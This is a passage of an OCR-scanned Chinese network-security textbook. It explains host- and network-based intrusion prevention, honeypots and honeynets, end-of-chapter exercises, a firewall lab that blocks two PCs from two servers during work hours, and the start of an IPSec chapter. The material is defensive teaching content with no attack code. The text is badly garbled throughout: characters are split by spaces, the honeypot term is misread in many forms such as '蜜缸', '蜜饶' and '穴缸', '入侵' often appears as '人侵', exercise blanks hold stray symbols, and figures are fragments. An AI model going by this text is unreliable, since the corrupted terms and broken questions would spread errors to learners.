1. 基于 主机 的 入 侵 防御 (HIPS) 

HIPS 通过 在 主机 /服务 器 上 安装 软件 代理 程序 ,防止 网 络 攻击 入 侵 操作 系统 以 及 应 用 
程序 。 基 于 主机 的 入侵 防御 技术 可 以 根据 自 定 义 的 安全 策略 以 及 分 析 学 习 机 制 来 阻 断 对 服 
务 器 .主机 发 起 的 恶意 人 侵 。HIPS 可 以 阻 断 缓冲 区 溢出 改变 登录 口令 改写 动态 链接 库 
以 及 其 他 试图 从 操作 系统 夺取 控制 权 的 入 侵 行为 ,整体 提升 主机 的 安全 水 平 。 

在 技术 上 ,HIPS 采用 独特 的 服务 器 保护 途径 ,利用 由 包 过 滤 、 状 态 包 检测 和 实时 人 侵 
检测 组 成 分 层 防御 体系 。 这 种 体系 能 够 在 提供 合理 吞吐 率 的 前 提 下 ,最 大 限度 地 保护 服务 
器 的 敏感 内 容 , 既 可 以 以 软件 形式 嵌入 到 应 用 程序 对 操作 系统 的 调用 当中 ,通过 拦截 针对 操 
作 系 统 的 可 疑 调用 ,提供 对 主机 的 安全 防御 ; 也 可 以 以 更 改 操作 系统 内 核 程 序 的 方式 ,提供 
比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 , 它 不 但 能 够 利用 特征 和 行为 规则 检测 , 阻 
止 诸如 缓冲 区 溢出 之 类 的 已 知 攻击 ,还 能 够 防范 未 知 攻击 ,防止 针对 Web 页 面 . 应 用 和 资源 
的 未 授权 的 任何 非法 访问 。HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ,不 同 的 平 
台 需 要 不 同 的 软件 代理 程序 。 

2. 基于 网 络 的 入 侵 防 御 (NIPS) 

NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系 统 的 安全 保护 。 由 于 它 采 用 在 线 连接 
方式 ,所 以 一 旦 辨识 出 入 侵 行为 , NIPS 就 可 以 去 除 整 个 网 络 会 话 ,而 不 仅仅 是 复位 会 话 。 
同样 由 于 实时 在 线 , NIPS 需要 具备 很 高 的 性 能 ,以 免 成 为 网 络 的 瓶颈 。 因 此 NIPS 通常 被 
设计 成 类 似 于 交换 机 的 网 络 设备 ,提供 线 速 吞吐 速率 以 及 多 个 网 络 端口 。 

NIPS 必须 基于 特定 的 硬件 平台 ,才能 实现 千 兆 级 以 上 的 网 络 流量 的 深度 数据 包 检 测 
和 阻 断 功能 。 这 种 特定 的 硬件 平台 通常 可 以 分 为 3 类 : 第 一 类 是 网 络 处 理 器 (网 络 芯片 ); 
第 二 类 是 专用 的 FPGA 编程 芯片 ; 第 三 类 是 专用 的 ASIC 芯片 。 

在 技术 上 ,NIPS 吸取 了 目前 NIDS 所 有 的 成 熟 技术 ,包括 特征 匹配 .协议 分 析 和 异常 检 
测 。 特 征 匹 配 是 最 广泛 应 用 的 技术 ,具有 准确 率 高 .速度 快 的 特点 。 基 于 状态 的 特征 匹配 不 
但 要 检测 攻击 行为 的 特征 ,还 要 检查 当前 网 络 的 会 话 状态 ,避免 受到 欺骗 攻击 。 协 议 分 析 是 
一 种 较 新 的 入 侵 检测 技术 , 它 充 分 利用 网 络 协议 的 高 度 有 序 性 ,并 结合 高 速 数 据 包 捕捉 和 协 
议 分 析 , 来 快速 检测 某 种 攻击 特征 。 协 议 分 析 正 在 逐渐 进入 成 熟 应 用 阶段 。 协 议 分 析 能 够 
理解 不 同 协议 的 工作 原理 ,以 此 分 析 这 些 协 议 的 数据 包 , 来 寻找 可 疑 或 不 正常 的 访问 行为 。 
通过 协议 分 析 ,IPS 能 够 针对 插入 (Insertion) 与 规避 (Evasion) 攻 击 进行 检测 。 异 常 检测 的 
误 报 率 比较 高 ,NIPS 不 将 其 作为 主要 技术 。 

3. 基于 应 用 的 入 侵 防御 (AIP) 

NIPS 产品 有 一 个 特例 , 即 基于 应 用 的 入侵 防御 (Application Intrusion Prevention， 
AIP), 它 把 基于 主机 的 人 侵 防御 扩展 成 为 位 于 应 用 服务 器 之 前 的 网 络 设 备 。AIP 被 设计 成 
一 种 高 性 能 的 设备 ,配置 在 应 用 数据 的 网 络 链 路 上 ,以 确保 用 户 遵守 设 定好 的 安全 策略 , 保 
护 服 务 器 的 安全 。NIPS 工作 在 网 络 上 ,直接 对 数据 包 进 行 检测 和 阻 断 ,与 具体 的 主机 / 服 
务 器 操作 系统 平台 无 关 。 
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4.5 人 侵 诱 骗 技术 


4.5.1 穴 缸 定义 


和 人 侵 诱骗 技术 是 相对 传统 入 侵 检 测 技术 更 为 主动 的 一 种 安全 技术 ,主要 包括 蜜 缸 
(Honeypot) 和 蜜 网 (Honeynet) 两 种 。 它 是 用 特有 的 特征 吸引 攻击 者 ,同时 对 攻击 者 的 各 种 
攻击 行为 进行 分 析 , 并 找到 有 效 的 对 付 方法 。 为 了 吸引 攻击 者 ,网 络 管理 员 通常 还 在 蜜 锥 上 
故意 留 下 一 些 安全 后 门 ,或 者 放置 一 些 攻击 者 希望 得 到 的 敏感 信息 ,当然 这 些 信 息 都 是 虚假 
的 。 当 入 侵 者 正 为 攻 入 目标 系统 而 沾沾自喜 时 ,殊不知 自己 在 目标 系统 中 的 所 作 所 为 ,包括 
输入 的 字符 ,执行 的 操作 等 都 已 经 被 蜜 镀 所 记录 。 

1. 蜜 摊 

蜜 钢 技术 通过 一 个 由 网 络 安全 专家 精心 设置 的 特殊 系统 来 引诱 黑客 ,并 对 黑客 进行 跟 
踪 和 记录 。 其 最 重要 的 功能 是 特殊 设置 的 对 于 系统 中 所 有 操作 的 监视 和 记录 ,网 络 安全 专 
家 通过 精心 的 伪装 使 得 黑客 在 进入 到 目标 系统 后 , 仍 不 知晓 自己 所 有 的 行为 已 处 于 系统 的 
监视 之 中 。 

首先 ,比较 一 下 一 个 具有 蜜 缸 的 系统 和 一 个 没有 任何 防范 措施 的 系统 的 区 别 。 虽 然 这 
两 者 都 有 可 能 被 和 人 侵 破 坏 , 但 是 本 质 却 完全 不 同 , 蜜 饶 是 网 络 管理 员 经 过 周密 布置 而 设 下 的 
“黑匣子 ”, 看 似 漏洞 百出 却 尽 在 掌握 之 中 , 它 收 集 的 入 侵 数据 十 分 有 价值 ; 而 后 者 实际 上 即 
使 被 人 侵 也 不 一 定 能 查 到 痕迹 。 因 此 , 蜜 饶 的 定义 是 : 蜜 饶 是 一 个 安全 资源 , 它 的 价值 在 于 
被 探测 攻击 和 损害 。 

设计 蜜 饶 的 初衷 就 是 让 黑客 人 侵 , 借 此 收集 证 据 , 同 时 隐藏 真实 的 服务 器 地 址 ,因此 ,对 
于 一 台 合格 的 蜜 饶 来 说 ,应 该 拥有 以 下 的 功能 : 发 现 攻击 ,产生 警告 ,强大 的 记录 能 力 , 其 
骗 , 协 助 调查 。 另 外 一 个 功能 由 管理 员 去 完成 , 那 就 是 在 必要 时 根据 蜜 饶 收 集 的 证 据 来 起 诉 
入 侵 者 。 图 4-18 为 蜜 钠 的 防护 原理 ,图 4-19 为 蜜 饶 的 体系 框架 。 

网 关 重 定向 器 蜜 织 1 





图 4-18 宣 色 的 防护 原理 
蜜 饶 并 不 修正 任何 问题 ,它们 仅 提供 额外 的 ` 有 价值 的 信息 。 所 以 说 蜜 饶 并 非 是 一 种 安 


全 的 解决 方案 ,这 是 因为 它 并 不 会 “修理 ”任何 错误 。 它 只 是 一 种 工具 ,如 何 使 用 这 个 工具 取 
决 于 用 户 想 做 什么 。 蜜 把 可 以 对 其 他 系统 和 应 用 进行 仿真 ,创建 一 个 监禁 环境 ,将 攻击 者 困 
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图 4-19 密 缸 的 体系 框架 











在 其 中 。 无 论 用 户 如 何 建立 和 使 用 蜜 缸 ,只 有 蜜 饶 受到 攻击 , 它 的 作用 才能 发 挥 出 来 。 所 以 
为 了 方便 攻击 ,一般 是 将 蜜 饶 设 置 成 域名 服务 器 Web 或 电子 邮件 转发 服务 等 流行 应 用 中 的 
一 种 。 

蜜 饶 的 特点 主要 有 两 个 : 首先 , 蜜 缸 技术 不 是 一 个 单一 的 技术 或 设备 ,而 是 一 个 安全 的 
网 络 系统 ,是 一 种 高 度 相互 作用 的 蜜 饶 ,在 该 系统 中 , 装 有 多 个 系统 和 应 用 软件 ; 其 次 ,所 有 
放 轩 在 蜜 钠 网 内 的 系统 都 是 标准 的 产品 系统 , 即 真实 的 系统 和 应 用 软件 ,都 不 是 仿效 的 。 

蜜 把 主要 有 以 下 几 种 类 型 

(1) 实 系统 蜜 负 。 实 系统 蜜 缸 即 为 真实 的 蜜 缸 ,其 上 运行 着 真实 的 系统 ,并 且 具 备 真 实 
的 可 被 人 侵 的 漏洞 ,这些 漏洞 具有 一 定 的 危险 性 ,但 可 以 记录 下 真实 的 入侵 信息 。 这 种 蜜 饶 
安装 的 系统 一 般 都 采用 较 老 版 本 的 操作 系统 ,不 打 任何 补丁 ,或 者 根据 管理 员 需 要 ,象征 性 
地 补 上 了 一 些 简单 的 漏洞 ,但 预 留 一 些 较为 复杂 的 漏洞 ,这 样 伪 装 成 起 来 更 像 真 实 的 系统 。 
设置 完成 后 ,将 该 蜜 饶 系 统 接 人 网 络 , 即 完 成 了 一 个 实 蜜 饶 系 统 的 部 署 。 根 据 目前 的 网 络 安 
全 扫描 频繁 度 来 看 ,这 样 的 蜜 饶 很 快 就 能 吸引 到 目标 并 接受 攻击 ,系统 运行 着 的 记录 程序 会 
记 下 入侵 者 的 一 举 一 动 。 但 这 种 蜜 饶 系 统 有 一 定 的 危险 性 ,因为 入 侵 者 的 每 一 次 人 侵 都 会 
引起 系统 真实 的 反应 ,例如 被 溢出 渗透、 夺取 权限 等 ,从 而 导致 密 饶 系统 失效 。 

(2) 伪 系 统 蜜 缸 。 伪 蜜 饶 系 统 也 是 建立 在 真实 系统 基础 上 的 ,但 是 它 与 实 蜜 饶 系 统 的 
最 大 区 别 就 是 “平台 与 漏洞 非 对 称 性 ”。 

众所周知 ,除了 Windows 操作 系统 以 外 ,还 有 Linux、UNIX、OS2 等 操作 系统 ,各 种 操 
作 系 统 的 核心 不 同 ,产生 的 漏洞 缺陷 也 就 不 尽 相同 , 即 很 少 有 能 同时 攻击 几 种 系统 的 漏洞 代 
码 。 例 如 ,攻击 者 可 以 用 LSASS 溢出 漏洞 得 到 Windows 的 权限 ,但 是 无 法 用 同样 的 手法 去 
进行 Linux 的 溢出 攻击 。 根 据 这 种 特性 ,就 产生 了 * 伪 系统 蜜 缸 ”, 它 利用 一 些 工具 程序 强大 
的 模仿 能 力 ,伪造 出 不 属于 自己 平台 的 “漏洞 ", 入 侵 这 样 的 “漏洞 ”, 几乎 是 不 可 能 的 一 一 因 
为 系统 本 来 就 没有 让 这 种 漏洞 成 立 的 条 件 ,这 就 大 大 提高 了 蜜 饶 系 统 抗 攻击 的 能 力 。 

伪 蜜 饶 系 统 的 优点 主要 体现 在 : 它 可 以 最 大 程度 地 防止 被 和 人 侵 者 破坏 ,也 能 模拟 不 存 
在 的 漏洞 ,例如 ,可 以 让 一 些 Windows 蠕虫 攻击 Linux 系统 (当然 需要 在 Linux 系统 中 模拟 
出 符合 条 件 的 Windows 特征 )。 其 缺点 在 于 : 如 果 设 计 不 够 精密 ,入 侵 者 很 容易 识破 伪装 ， 
且 这 种 方式 对 于 脚本 的 编写 要 求 较 高 。 
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2. 蜜 网 

蜜 网 是 一 种 特殊 的 蜜 把 , 蜜 钠 物 理 上 通常 是 一 台 运 行 单个 操作 系统 或 者 借助 于 虚拟 化 
软件 运行 多 个 虚拟 操作 系统 的 “牢笼 ?主机 。 单 机 蜜 饶 系 统 最 大 的 缺陷 在 于 数据 流 将 直接 进 
和 网络, 管理 者 难以 控制 蜜 饶 主 机 外 出 流量 ,入 侵 者 容易 利用 蜜 灌 主机 作为 跳板 来 攻击 其 他 
机 器 。 解 决 这 个 问题 的 方法 是 把 密 饶 主机 放置 在 防火 墙 的 后 面 , 所 有 进出 网 络 的 数据 都 会 
通过 这 里 ,并 可 以 控制 和 捕获 这 些 数 据 , 这 种 网 络 诱骗 环境 称 为 蜜 网 。 

蜜 网 作为 蜜 饶 技 术 中 的 高 级 工具 ,一般 是 由 防火 墙 、 路 由 器 ,入 侵 检 测 系统 以 及 一 台 习 

台 蜜 饶 主 机 组 成 的 网 络 系统 ,也 可 以 使 用 虚拟 化 软件 来 构建 虚拟 蜜 网 。 相 对 于 单机 蜜 饶 ， 
蜜 网 实现 ,管理 起 来 更 加 复杂 ,但 是 这 种 多 样 化 的 系统 能 够 更 多 地 揭示 入 侵 者 的 攻击 特性 ， 
极 大 地 提高 密 饶 系统 的 检测 分析、 响应 和 恢复 受 侵 害 系 统 的 能 力 。 

在 蜜 网 中 ,防火 墙 的 作用 是 限制 和 记录 网 络 数 据 流 ,入 侵 检测 系统 通常 用 于 观察 潜在 的 
攻击 和 译 码 ,并 在 系统 中 存储 网 络 数据 流 。 蜜 网 中 装 有 多 个 操作 系统 和 应 用 程序 供 安全 探 
测 和 攻击 。 特 定 的 攻击 者 会 瞄准 特定 的 系统 或 漏洞 ,通过 部 署 不 同 的 操作 系统 和 应 用 程序 ， 
可 以 更 准确 地 了 解 安 全 的 攻击 趋势 和 特征 。 另 外 ,所 有 放置 在 蜜 网 中 的 系统 都 是 真实 的 系 
统 , 没 有 模拟 的 环境 或 故意 设置 的 漏洞 。 而 且 利 用 防火 墙 或 路 由 器 的 功能 ,能 在 网 络 中 建立 
相应 的 重 定 向 机 制 , 将 入侵 者 或 可 疑 的 连接 主动 引入 蜜 网 ,可 以 提高 蜜 网 的 运行 效率 。 

图 4-20 是 一 个 蜜 网 系统 的 结构 图 。 







本 由 管理 网 | 


、 轩 
SNIDS 日志/ 告警 


图 4-20 一 个 密 网 系统 的 结构 图 


图 4-20 中 包括 了 3 个 不 同 的 网 络 : 蜜 网 .管理 网 络 和 Internet。 其 中 ,日 志 /告警 服务 
器 IDS 与 防火 墙 组 成 管理 网 络 ,Solaris 服务 器 、Windows 2003 服务 器 .Linux 服务 器 .日志 
服务 器 和 交换 机 组 成 蜜 网 。 在 该 系统 中 ,防火 墙 .IDS 和 蜜 镀 主 机 的 系统 负责 日 志 的 捕获 。 
因为 手段 高 明 的 入侵 者 攻 和 系统 后 ,通常 会 试图 更 改 甚至 销毁 目标 主机 上 易于 暴露 人 侵 行 
为 的 各 种 记录 。 蜜 网 在 确保 不 被 入侵 者 发 现 诱骗 的 前 提 下 , 尽 可 能 多 地 捕获 攻击 行为 信息 ， 
包括 所 有 的 按键 记录 、CPU 的 使 用 率 或 者 进程 列表 、 使 用 过 的 各 种 协议 数据 包 内 容 等 ,同时 
要 注意 充分 保证 捕获 信息 的 完整 和 安全 。 防 火 墙 在 IP 层 记录 所 有 进出 蜜 网 的 连接 ,设计 为 
允许 所 有 进入 的 连接 ,但 是 对 从 蜜 网 向 Internet 发 起 的 连接 进行 跟踪 ,一 旦 蜜 网 达到 了 规定 的 
向 外 的 连接 数 , 防 火 墙 将 阻 断 任何 后 续 的 连接 ,并 且 及 时 向 系统 管理 员 发 出 警告 信息 ; IDS 在 
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数据 链 路 层 对 蜜 网 中 的 网 络 数据 流 进 行 监控 ,分 析 和 抓 取 数据 流 信息 ,以便 将 来 能 够 重 现 攻击 
行为 ,同时 在 发 现 可 疑 举动 时 报警 。 蜜 饶 主机 除了 使 用 操作 系统 自身 提供 的 日 志 功能 外 ,还 可 
以 利用 第 三 方 软件 加 强 日 志 功能 ,并 且 传输 到 安全 级 别 更 高 的 远程 日 志 服务 器 上 备份 。 


4.5.2 穴 缸 技术 


(1) 网 络 欺骗 技术 。 为 了 使 蜜 缸 对 入 侵 者 更 有 吸引 力 ,通常 应 采用 各 种 欺骗 手段 。 例 
如 ,在 欺骗 主机 上 模拟 一 些 操作 系统 .一 些 网 络 攻击 者 最 “喜欢 ”的 端口 和 各 种 认为 有 和 人 侵 可 
能 的 漏洞 等 。 

(2) 端口 重 定向 技术 。 端 口 重 定向 技术 ,可 以 在 工作 系统 中 模拟 一 个 非 工作 服务 。 例 
如 ,在 网 络 中 正常 使 用 了 Web 服务 (80 端口 ) ,此 时 将 Telnet(23 端口 ) 和 FTP(21 端口 ) 服 
务 重 定向 到 蜜 钠 系 统 中 ,这 两 个 服务 实际 上 是 没有 开启 的 ,但 攻击 者 在 进行 扫描 时 则 发 现 这 
两 个 端口 是 开放 的 ,实际 上 这 两 个 端口 是 蜜 网 虚拟 出 来 的 ,对 其 攻击 不 会 造成 危害 。 

(3) 攻击 (入侵 ) 报 警 和 数据 控制 。 蜜 饶 系 统 本 身 就 可 以 模拟 成 一 个 操作 系统 ,我 们 可 
以 把 其 本 身 设 定 成 为 易 攻破 的 一 台 主 机 , 即 开放 一 些 端口 并 设置 弱 口 令 等 ,并 设 定 出 相应 的 
应 答 程 序 , 如 在 Linux 中 的 Shell 和 FTP 程序 , 当 攻 击 者 “入侵 ” 进 入 系统 ( 蜜 网 虚拟 出 来 的 
系统 ) 后 ,就 相当 于 攻击 者 进入 一 个 设 定 的 “陷阱 ”, 那 么 攻击 者 所 做 的 一 切 都 在 其 监视 之 中 。 
还 可 以 给 入 侵 者 一 个 网 络 连接 ,允许 其 进行 网 络 数据 传输 ,并 可 以 作为 跳板 进行 其 他 攻击 ， 
以 更 真实 地 迷惑 攻击 者 。 

(4) 数据 捕获 技术 。 在 攻击 者 入 侵 的 同时 , 蜜 饶 系 统 将 记录 攻击 者 的 输入 /输出 信息 、 
键盘 记录 信息 ,屏幕 信息 以 及 攻击 者 启动 的 进程 和 使 用 过 的 工具 ,分 析 攻 击 者 所 要 进行 的 下 
一 步 操作 。 对 于 捕获 的 数据 ,应 存放 在 安全 的 服务 器 中 ,不 应 存放 在 蜜 网 主机 上 ,防止 被 攻 
击 者 发 现 , 以 免 被 攻击 者 觉察 到 是 一 个 “陷阱 ”而 提前 退出 。 


习 题 4 


4.1 防火 墙 基础 

1. 防火 墙 用 于 将 Internet 和 内 部 网 络 隔离 ,是 ( 入 

2. 简 述 防火 墙 的 原理 。 

3. 防火 墙 的 作用 是 ( x ) 的 通信 进出 被 保护 的 网 络 , 迫 使 用 户 强化 自己 的 
( ) .简化 ( Y's 


4. 防火 墙 的 主要 功能 有 哪些 ? 防火 墙 有 哪些 优点 ? 存在 哪些 局 限 性 ? 

5. 防火 墙 按 技术 分 类 有 哪些 ? 

6. 目前 普遍 的 防火 墙 按 组 成 结构 可 分 为 ( )\( ) ,tk Xs 

7. 防火 墙 按 在 网 络 中 部 署 位 置 的 不 同 来 划分 ,可 分 为 ( )、( )、 )。 

8. 在 被 屏 项 的 主机 体系 中 , 堡 全 主机 位 于 ( ) 中 ,所 有 的 外 部 连接 都 经 过 滤 路 
由 器 到 它 上 面 去 。 


A. 内 部 网 络 B. 周边 网 络 C. 外 部 网 络 D. 自由 连接 
9. 简 述 屏蔽 主机 防火 墙 的 基本 原理 。 
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10. 简 述 屏蔽 子 网 防火 墙 的 基本 原理 。 
11. 防火 墙 中 堡垒 主机 的 作用 是 什么 ? 
12. 防火 墙 部 署 的 基本 过 程 有 哪些 步骤 ? 
4.2 防火 墙 安 全 配置 实例 
1. 防火 墙 配 置 入侵 防御 功能 的 目的 是 ( $s 
2， 防火 墙 配置 人 侵 防 御 功 能 的 配置 思路 是 什么 ? 
3. 如 何 具体 配置 接口 IP 地 址 和 安全 区 域 ? 如 何 创建 入 侵 防御 配置 文件 profile_ips_ 
pc, 配 置 签名 过 滤器 ? 
. 防火 墙 配置 内 容 过 滤 功 能 的 目的 是 ( Ws 
.如 何 新 建 内 容 过 滤 配 置 文件 ? 如 何 新 建 关键 字 组 ? 
.3 ”入侵 检测 技术 
.人 侵 检测 是 ( 5 
. IDS 有 哪些 功能 ? 
. 基于 数据 源 的 IDS 有 哪些 分 类 ? 
. 简 述 入 侵 检测 的 一 般 过 程 。 
. 常用 的 入 侵 检 测 方法 有 哪 3 种 ? 
.外 部 数据 包 经 过 过 滤 路 由 只 能 阻止 ) 唯 一 的 IP 欺骗。 
A. 内 部 主机 伪装 成 外 部 主机 IP B. 内 部 主机 伪装 成 内 部 主机 IP 
C. 外 部 主机 伪装 成 外 部 主机 IP D. 外 部 主机 伪装 成 内 部 主机 IP 
7. ICMP 数据 包 的 过 滤 主 要 基于 ( 和 
A. 目标 端口 B. 源 端 口 C. 消息 源 代码 D. 协议 prot 
4.4 入 侵 防 御 系 统 
1. 简 述 入 侵 防 御 系 统 的 工作 原理 。 
2， 人 侵 防 御 系统 有 哪些 分 类 ? 
3. 入 侵 防 御 系 统 的 技术 特征 包括 ( jak yt jt js 
4.5 入侵 诱 骗 技 术 
1. 什么 是 蜜 饶 技 术 ? 有 哪些 类 型 ? 
2. 简 述 蜜 网 技术 。 





中 四 


实验 4 基于 IP 地 址 和 端口 的 防火 墙 安全 策略 配置 


【实验 目的 】 
通过 配置 安全 策略 ,实现 基于 IP 地 址 .时 间 段 以 及 服务 (端口 ) 的 访问 控制 。 
【实验 内 容 】 


某 企 业 网 络 拓扑 结构 如 图 4-21 所 示 ,部 署 有 两 台 业 务 服务 器 ,其 中 Serverl 通过 TCP 
8888 端口 对 外 提供 服务 ,Server2 通过 UDP 6666 端口 对 外 提供 服务 。 需 要 通过 FW 进行 
访问 控制 ,8: 00 一 17: 00 的 上 班 时 间 段 内 禁止 IP 地 址 为 10. 1. 1. 2.10. 2. 1. 2 的 两 台 PC 使 
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用 这 两 台 服 务 器 对 外 提供 的 服务 。 其 他 PC 在 任何 时 间 都 可 以 使 用 这 两 台 服 务 器 对 外 提供 
的 服务 。 












Trust 
DMZ 
Serverl 
10.2.0.10/24 GE < 
TD PC 
， op 
FW 
GE1/0/3 
10.2.1.1/24 10.2.1.0/24 
Server2 < 
10.2.0.11/24 PC 
10.2.1.2/24 




















图 4-21 基于 IP 地址 和 端口 的 安全 策略 组 网 图 


1. 数据 规划 
根据 如 表 4-10 所 示 的 参数 表 配 置 实验 网 络 。 


表 4-10 配置 参数 表 


项 目 数 据 说 明 
Gigabit Ethernet 1/0/1 IP 地 址 : 10. 2.0.1/24 安全 区 域 : DMZ 一 
Gigabit Ethernet 1/0/2 IP 地 址 : 10.1.1.1/24 安全 区 域 : Trust 一 
Gigabit Ethernet 1/0/3 IP 地 址 : 10.2.1.1/24 安全 区 域 : Trust 一 























Server 1 IP 地 址 : 10.2.0.10/24 端口 : TCP 8888 | 通过 非 知 名 端口 提供 服务 
Server 2 IP 地 址 : 10.2.0.11/24 端口 : UDP 6666 | 通过 非 知 名 端口 提供 服务 
2. 配置 思路 


(1) 除了 两 台 特殊 的 PC 外 ,整个 Trust 区 域 的 PC 都 可 以 访问 服务 器 ,所 以 先 配置 禁 
止 两 台 PC 访问 服务 器 的 安全 策略 ,然后 再 开放 Trust 到 DMZ 的 域 间 访问 。 

(2) 系统 默认 存在 一 条 默认 安全 策略 (条 件 均 为 any, 动 作 默 认为 禁止 )。 如 果 需 要 控制 
只 有 某 些 IP 可 以 访问 服务 器 , 则 需要 保持 默认 安全 策略 的 禁止 动作 ,然后 配置 允许 哪些 IP 
访问 服务 器 的 安全 策略 。 

(3) 安全 策略 是 按照 配置 顺序 匹配 的 ,注意 先 配 置 细 化 的 后 配置 宽泛 的 策略 。 例 如 , 需 
要 控制 在 10. 1. 1. 0/24 网 段 中 ,除了 某 几 个 IP 不 能 访问 服务 器 外 ,其 他 的 IP 都 可 以 访问 。 
此 时 需要 先 配 置 拒绝 特殊 IP 通过 的 安全 策略 ,然后 再 配置 允许 整个 网 段 通过 的 安全 策略 。 

(4) 访问 控制 涉及 限制 源 IP、 目 的 IP 及 端口 .时 间 段 ,需要 提前 配置 好 地 址 集 、 服 务 集 
和 时 间 段 ,然后 配置 安全 策略 引用 这 些 限制 条 件 。 

(5) 配置 源 IP 地 址 集 ,将 几 个 不 允许 访问 服务 器 的 IP 地 址 加 入 地 址 集 。 

(6) 配置 安全 策略 时 可 以 直接 指定 多 个 IP 地 址 或 地 址 段 , 但 是 对 于 零散 的 \ 不 连续 的 
地 址 建议 配置 为 地 址 集 ,方便 集中 管理 ,而 且 也 方便 被 其 他 策略 复 用 。 

3. 说 明 

(1) 因为 策略 的 目的 地 址 是 单一 的 地 址 ,所 以 这 里 没有 配置 目 IP 的 地 址 集 , 采 用 了 配 
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置 安全 策略 时 直接 输入 目的 地 址 的 方式 。 

(2) 配置 两 个 自 定义 服务 集 ,分 别 将 两 台 服 务 器 的 非 知名 端口 加 入 服务 集 。 

服务 器 使 用 的 是 非 知名 端口 ,必须 配置 自 定义 服务 集 , 然 后 在 安全 策略 中 引用 ; 如 果 服 
务 器 通过 知名 端口 (例如 ,HTTP 的 80 端口 ) 提 供 的 服务 ,可 以 在 配置 安全 策略 时 直接 使 用 
预定 义 服务 集 ( 例 如 , HTTP、FTP 等 )。 

(3) 配置 一 个 范围 为 上 班 时 间 (08:00 一 17:00) 的 时 间 段 。 

(4) 配置 两 条 安全 策略 ,分别 限 制 IP 地 址 为 10. 1. 1. 2 和 10. 2. 1. 2 的 PC 对 两 台 服 务 
器 的 访问 。 

(5) 配置 允许 Trust 到 DMZ 的 域 间 访问 安全 策略 。 

4. 操作 步骤 

(1) 配置 各 接口 基本 参数 。 

(2) 配置 名 称 为 server_deny 的 地 址 集 , 将 不 允许 访问 服务 器 的 IP 地 址 加 入 地 址 集 。 

步骤 : 截图 

(3) 配置 名 称 为 time_deny 的 时 间 段 ,指定 PC 不 允许 访问 服务 器 的 时 间 。 

(4) 分 别 为 Serverl 和 Server2 配置 自 定义 服务 集 serverl_port 和 server2_port, 将 服 
务 器 的 非 知 名 端口 加 入 服务 集 。 

配置 自 定义 服务 集 serverl_port。 


步 又 : 截图 : 
重复 上 述 步 又 为 Server2 配置 自 定义 服务 集 server2_port。 
截图 : 


(5) 配置 安全 策略 ,引用 之 前 配置 的 地 址 集 、 时 间 段 及 服务 集 。 
限制 PC 使 用 Serverl 对 外 提供 的 服务 的 安全 策略 。 


步骤: 截图 : 

限制 PC 使 用 Server2 对 外 提供 的 服务 的 安全 策略 。 
步骤 ， 截图 : 

允许 PC 使 用 Serverl 对 外 提供 的 服务 的 安全 策略 。 
步骤 ， 截图 : 

允许 PC 使 用 Server2 对 外 提供 的 服务 的 安全 策略 。 
步骤 : 截图 : 

5. 结果 验证 


在 08:00 到 17:00 时 间 段 内 ,IP 地 址 为 10. 1. 1.2、10. 2.1.2 的 两 台 PC 无 法 使 用 这 两 
台 服 务 器 对 外 提供 的 服务 ,在 其 他 时 间 段 可 以 使 用 。 其 他 PC 在 任何 时 间 都 可 以 使 用 这 两 
台 服 务 器 对 外 提供 的 服务 。 

6. 配置 脚本 

请 读者 根据 实验 内 容 记录 。 
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本 章 学 习 要 求 

掌握 IP 安全 的 概念 ,IP 安全 体系 结构 ; 

掌握 IPSec 工作 方式 、 安 全 隧道 的 建立 方法 ; 

掌握 VPN 隧道 技术 、VPN 基本 原理 ; 

掌握 Web 安全 实现 方法 ,认识 Web 安全 威胁 ; 
掌握 安全 Web 站 点 的 创建 ,认识 SSL 协议 的 构成 。 


ee 9 + 


5.1 IP 安 全 


IP 协议 是 整个 TCP/IP 协议 体系 结构 的 核心 ,存在 两 个 IP 版本: IPv4 和 IPv6。 

IPv4 在 Internet 中 占 统治 地 位 ,但 IPv4 在 设计 之 初 并 未 考虑 安全 性 ,IP 包 并 不 存在 任 
何 安 全 特性 ,导致 在 网 络 上 传输 的 数据 很 容易 受到 各 式 各 样 的 攻击 。 攻 击 者 很 容易 伪造 IP 
包 的 地 址 \ 修 改 包 中 的 内 容 、 重 播 以 前 的 包 以 及 在 传输 途中 拦截 并 查看 包 的 内 容 等 。 因 此 ， 
通信 双方 不 能 保证 收 到 IP 数据 报 的 真实 性 。 

IPv6 是 为 了 解决 IPv4 存在 的 地 址 短缺 问题 和 增加 安全 性 而 提出 的 改进 协议 。 

IP 层 的 安全 性 应 达到 以 下 几 个 目标 。 

(1) 期 望 安全 的 用 户 能 够 使 用 基于 密码 学 的 安全 机 制 。 

(2) 应 能 同时 适用 于 IPv4 和 IPv6 。 

(3) 算法 独立 。 

(4) 有 利于 实现 不 同 的 安全 策略 。 

(5) 对 没有 采取 该 机 制 的 用 户 不 会 有 负面 影响 。 


5.1.1 IPSec 定义 


为 了 加 强 Internet 的 安全 性 ,从 1995 年 开始 ,IETF 着 手 制定 了 一 套用 于 保护 IP 通信 
的 IP 安全 协议 (IP Security,IPSec) 。IPSec 是 IPv6 的 一 个 组 成 部 分 ,是 IPv4 的 一 个 可 选 
扩展 协议 。IPSec 弥补 了 IPv4 在 协议 设计 时 安全 性 方面 的 不 足 。 

IPSec 定义 了 一 种 标准 的 、 健 壮 的 以 及 包容 广泛 的 机 制 ,可 用 它 为 IP 以 及 上 层 协议 ( 比 
如 TCP 或 者 UDP) 提 供 安全 保证 。IPSec 的 目标 是 为 IPv4 和 IPv6 提供 具有 较 强 的 互 操作 
能 力 、 高 质量 和 基于 密码 的 安全 功能 ,在 IP 层 实现 多 种 安全 服务 ,包括 访问 控制 .数据 完整 
性 、 机 密 性 等 。IPSec 通过 支持 一 系列 加 密 算 法 如 DES 三重 DES、IDEA 和 AES 等 确保 通 
信和 双方 的 机 密 性 。 

IPSec 协议 集 提供 了 下 面 几 个 方面 的 安全 服务 。 

(1) 数据 完整 性 (Data Integrity): 保持 数据 一 致 性 ,防止 未 授权 生成 .修改 或 删除 
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数据 。 

(2) 认证 (Authentication) : 保证 接收 的 数据 与 发 送 的 数据 相同 ,保证 实际 发 送 者 就 是 
声称 的 发 送 者 。 

(3) 保密 性 (Confidentiality) : 传输 的 数据 是 经 过 加 密 的 ,只 有 特定 的 接收 者 知道 发 送 
的 内 容 。 

